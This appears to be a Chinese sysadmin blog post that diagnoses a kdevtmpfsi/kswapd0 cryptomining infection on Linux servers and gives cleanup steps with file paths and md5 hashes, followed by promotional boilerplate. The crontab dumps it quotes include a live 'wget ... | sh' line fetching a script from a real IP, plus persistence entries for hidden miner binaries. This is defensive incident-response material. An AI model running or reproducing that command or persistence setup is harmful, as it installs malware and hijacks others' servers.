top - 13:55:18 up 21 days, 4:43, 1 user, load average: 4.52, 4.25, 3.76
Tasks: 285 total, 1 running, 284 sleeping, 0 stopped, 0 zombie
%Cpu(s): 96.7 us, 2.6 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.7 si, 0.0 st
KiB Mem : 1882020 total, 110312 free, 1209604 used, 562104 buff/cache
KiB Swap: 0 total, 0 free, 0 used. 218676 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
3460 elastic+ 20 0 307928 269380 4 S 70.8 14.3 611:32.96 cron
6011 elastic+ 20 0 50476 15104 4 S 24.9 0.8 4:55.06 sshd
查看了一下定时任务:
[root@tcloud ~]# crontab -l
no crontab for root
查看了一下 /var/spool/cron/ 文件夹的定时任务:
[root@tcloud ~]# cd /var/spool/cron/
[root@tcloud cron]# ll
total 12
-rw------- 1 elasticsearch elasticsearch 328 Sep 13 23:19 elasticsearch
-rw------- 1 gpadmin gpadmin 73 Sep 2 01:55 gpadmin
-rw------- 1 hadoop hadoop 283 Aug 20 11:57 hadoop
[root@tcloud cron]# cat ./elasticsearch
1 1 */2 * * /usr/local/elasticsearch/.configrc/a/upd>/dev/null 2>&1
@reboot /usr/local/elasticsearch/.configrc/a/upd>/dev/null 2>&1
5 8 * * 1 /usr/local/elasticsearch/.configrc/b/sync>/dev/null 2>&1
@reboot /usr/local/elasticsearch/.configrc/b/sync>/dev/null 2>&1
#0 */23 * * * /tmp/.X26-unix/.rsync/c/aptitude>/dev/null 2>&1
这个明显就是kdevtmpfsi挖矿病毒的定时任务
[root@tcloud cron]# cat ./gpadmin
-
-
-
-
- wget -q -O - http://195.3.146.118/spr.sh | sh > /dev/null 2>&1
-
-
-
[root@tcloud cron]# cat ./hadoop
1 1 */2 * * /tmp/.X25-unix/.rsync/c/a/upd>/dev/null 2>&1
@reboot /tmp/.X25-unix/.rsync/c/a/upd>/dev/null 2>&1
5 8 * * 1 /tmp/.X25-unix/.rsync/c/b/sync>/dev/null 2>&1
@reboot /tmp/.X25-unix/.rsync/c/b/sync>/dev/null 2>&1
0 */23 * * * /tmp/.X25-unix/.rsync/c/aptitude>/dev/null 2>&1
查看了一下阿里云的服务器:
[root@aliyun ~]# cd /var/spool/cron/
[root@aliyun cron]# ll
total 0
### 2.病毒处理建议
建议企业 Linux 服务器管理员检查服务器资源占用情况,及时修改弱密码,避免被暴力破解。若发现服务器已被入侵安装挖矿木马,可参考以下步骤手动检查、清除:
1. 删除以下文件,杀死对应进程:
/tmp/\*-unix/.rsync/a/kswapd0
\*/.configrc/a/kswapd0 md5: 84945e9ea1950be3e870b798bd7c7559
/tmp/\*-unix/.rsync/c/tsm64 md5: 4adb78770e06f8b257f77f555bf28065
/tmp/\*-unix/.rsync/c/tsm32 md5: 10ea65f54f719bffcc0ae2cde450cb7a
2. 检查 cron.d 中是否存在包含以下内容的定时任务,如有进行删除:
/a/upd
/b/sync
/c/aptitude
### 最后的话
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
### 资料预览
给大家整理的视频资料:
![](https://img-blog.csdnimg.cn/img_convert/271f4030262dd7f336f0a8ef36345981.png)
给大家整理的电子书资料:
![](https://img-blog.csdnimg.cn/img_convert/c70a1aa6756eb37a92ace9fa313c66cf.png)
**如果本文对你有帮助,欢迎点赞、收藏、转发给朋友,让我有持续创作的动力!**
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**[需要这份系统化的资料的朋友,可以点击这里获取!](https://bbs.csdn.net/topics/618542503)**
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
**
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**